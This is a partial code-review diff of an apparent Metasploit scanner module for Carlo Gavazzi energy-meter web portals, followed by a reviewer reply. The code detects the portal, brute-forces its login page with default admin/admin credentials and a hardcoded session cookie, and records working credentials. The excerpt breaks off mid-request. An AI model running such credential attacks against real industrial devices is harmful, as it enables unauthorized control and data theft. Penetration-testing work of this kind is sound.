modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb

```diff
@@ -0,0 +1,260 @@
+      },
+      'References' =>
+        [
+          ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03']
+        ],
+      'Author' =>
+         [
+           'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
+         ],
+      'License' => MSF_LICENSE,
+      'DefaultOptions' =>
+         {
+           'SSL' => false,
+           'VERBOSE' => true
+         }))
+
+    register_options(
+      [
+        Opt::RPORT(80),	# Application may run on a different port too. Change port accordingly.
+        OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'admin']),
+        OptString.new('PASSWORD', [true, 'A specific password to authenticate with', 'admin'])
+      ], self.class
+    )
+  end
+
+  def run_host(ip)
+    unless is_app_carlogavazzi?
+      return
+    end
+
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+    ewplantdb
+  end
+
+  #
+  # What's the point of running this module if the target actually isn't Carlo Gavazzi EOS Web
+  #
+
+  def is_app_carlogavazzi?
+    begin
+      res = send_request_cgi(
+        {
+          'uri'       => '/',
+          'method'    => 'GET'
+        }
+      )
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res && res.code == 200 && (res.body.include?('Accedi') || res.body.include?('Gavazzi') || res.body.include?('styleVMUC.css') || res.body.include?('VMUC')))
+      vprint_good("#{rhost}:#{rport} - Running Carlo Gavazzi Energy Meter Web Management portal...")
+      return true
+    else
+      vprint_error("#{rhost}:#{rport} - Application is not Carlo Gavazzi. Module will not continue.")
+      return false
+    end
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+      res = send_request_cgi(
+        {
+          'uri'       => '/login.php',
+          'method'    => 'POST',
+          'headers'   => {
+            'Cookie' => 'PHPSESSID=xxe32qk2gbkfn3ur2nm7ypmgyp'
```

Comment:
@h00die yes, session can be fixed. In fact, for login check, there is no need for a cookie. Randomized cookie is a good point. I've implemented it in the module now. Thanks.